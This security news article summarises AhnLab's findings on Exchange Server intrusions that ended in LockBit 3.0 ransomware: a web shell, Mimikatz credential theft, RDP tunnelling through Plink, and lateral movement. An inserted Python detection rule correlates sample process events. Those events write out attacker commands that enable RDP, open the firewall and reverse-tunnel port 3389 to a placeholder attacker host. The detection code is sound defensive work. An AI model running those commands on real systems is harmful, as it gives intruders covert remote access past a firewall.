Last week two zero-day flaws, CVE-2022-41040 and CVE-2022-41082, impacting Microsoft Exchange Server were revealed by the Vietnamese security firm GTSC. Microsoft later confirmed that the zero-day flaws affecting Microsoft Exchange Server 2013, 2016, and 2019 are being exploited in the wild.
Two of the impacted Exchange servers were examined by AhnLab, a Korean cyber threat analysis company, which found that they had been compromised with LockBit 3.0 ransomware and that the AD admin account had been taken over. The main finding of the AhnLab research was that the attack scenario or pattern used on the Exchange server was distinct from the zero-day flaws discovered earlier. Based on the attack technique, the name of the WebShell file created, and the further attacks that followed WebShell generation, it is assumed that the attacker employed a different zero-day vulnerability. The AhnLab research claims that users may be vulnerable to attacks due to an unpatched vulnerability in Microsoft Exchange Server. After the WebShell was uploaded, ransomware was installed on the computers and AD administrator accounts were quickly taken over.
How does it work?
The WebShell was uploaded to the OWA folder and ran with System privileges. Using those privileges, the attacker ran Mimikatz to steal the passwords for the Administrator and ExchService AD administrator accounts.
The attacker used the WebShell to create and run scripts and applications for tunneling. When the generated r.bat script is executed, RDP is enabled by editing the registry and the RDP firewall policy is allowed. Then the tunneling application p64.exe (Plink) is launched to connect the local 3389 (RDP) port to the remote server address. This enables external RDP access to the internal network system, bypassing the company's firewall.
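As an added detection example (not from the AhnLab report or this article), the following Python correlates constructed Sysmon-style process-creation events per host to flag the r.bat chain described above: a shell spawned from the web server, RDP enabled in the registry, the RDP firewall rule opened, and a renamed Plink (p64.exe) forwarding port 3389. The w3wp.exe parent process, the event field names and the sample command lines are assumptions.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed sample process-creation events (Sysmon Event ID 1 style), not real telemetry.
# "orig" stands in for Sysmon's OriginalFileName, which survives the p64.exe rename of Plink.
SAMPLE_EVENTS = [
    {"ts": "2022-10-02T03:10:01", "host": "EXCH01", "parent": "w3wp.exe", "image": "cmd.exe",
     "orig": "cmd.exe", "cmdline": "cmd.exe /c r.bat"},
    {"ts": "2022-10-02T03:10:02", "host": "EXCH01", "parent": "cmd.exe", "image": "reg.exe",
     "orig": "reg.exe", "cmdline": 'reg add "HKLM\\...\\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f'},
    {"ts": "2022-10-02T03:10:03", "host": "EXCH01", "parent": "cmd.exe", "image": "netsh.exe",
     "orig": "netsh.exe", "cmdline": 'netsh advfirewall firewall set rule group="remote desktop" new enable=Yes'},
    {"ts": "2022-10-02T03:10:05", "host": "EXCH01", "parent": "cmd.exe", "image": "p64.exe",
     "orig": "plink.exe", "cmdline": "p64.exe -R 3389:127.0.0.1:3389 <attacker-host>"},
    {"ts": "2022-10-02T09:00:00", "host": "WKS07", "parent": "explorer.exe", "image": "reg.exe",
     "orig": "reg.exe", "cmdline": "reg query HKLM\\SOFTWARE\\Microsoft"},
]

# One predicate per stage of the r.bat / Plink chain (cl = lower-cased command line); w3wp.exe (IIS worker serving OWA) as the web shell's parent is an assumption.
STAGES = {
    "webshell_spawns_shell": lambda e, cl: e["parent"].lower() == "w3wp.exe"
        and e["image"].lower() in ("cmd.exe", "powershell.exe"),
    "rdp_enabled_in_registry": lambda e, cl: e["image"].lower() == "reg.exe"
        and "fdenytsconnections" in cl and re.search(r"/d\s+0\b", cl) is not None,
    "rdp_firewall_rule_opened": lambda e, cl: e["image"].lower() == "netsh.exe"
        and "remote desktop" in cl and "enable=yes" in cl,
    "plink_forwards_3389": lambda e, cl: e["orig"].lower() == "plink.exe"
        and "-r" in cl.split() and "3389" in cl,
}

def detect_rdp_tunnel_chain(events, window_minutes=10, min_stages=2):
    # Per host, alert when at least min_stages distinct stages occur within window_minutes.
    hits = defaultdict(list)
    for e in sorted(events, key=lambda e: e["ts"]):
        cl = e["cmdline"].lower()
        for stage in (n for n, p in STAGES.items() if p(e, cl)):
            hits[e["host"]].append((datetime.fromisoformat(e["ts"]), stage))
    alerts, span = [], timedelta(minutes=window_minutes)
    for host, seq in hits.items():
        i = 0
        while i < len(seq):
            start = seq[i][0]
            window = [s for t, s in seq[i:] if t - start <= span]
            if len(set(window)) >= min_stages:
                alerts.append({"host": host, "first_seen": start.isoformat(), "stages": sorted(set(window))})
                i += len(window)
            else:
                i += 1
    return alerts
```

Matching on OriginalFileName rather than the on-disk name is what catches the p64.exe rename; the benign `reg query` on WKS07 produces no alert.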
The attackers moved through the victim's internal network using a variety of tactics, including administrative utility tools. To avoid detection by antivirus software, the attackers constructed and used Windows batch files containing common system commands such as wmic and copy, as well as commercial software used for administrative functions. Using the network scanning tool netscan, the attacker compiled a list of internal systems. After obtaining accounts with AD administrator rights (ExchService, Administrator) using Mimikatz, the attacker used a variety of tactics to access internal systems:
Connecting over RDP and using TeamViewer for remote access
Copying remote files with the copy command
Executing commands remotely with PsExec and WMIC
The ransomware was distributed by the attacker via a script in the form of a Windows batch file.
There is currently no formal confirmation that AhnLab's findings differ from the previously published Exchange zero-days, nor has any new CVE been registered or published by MITRE. If they turn out to be different, Microsoft Exchange Server may have another zero-day flaw.
Information security specialist, currently working as risk infrastructure specialist & investigator.
15 years of experience in risk and control process, security audit support, business continuity design and support, workgroup management and information security standards.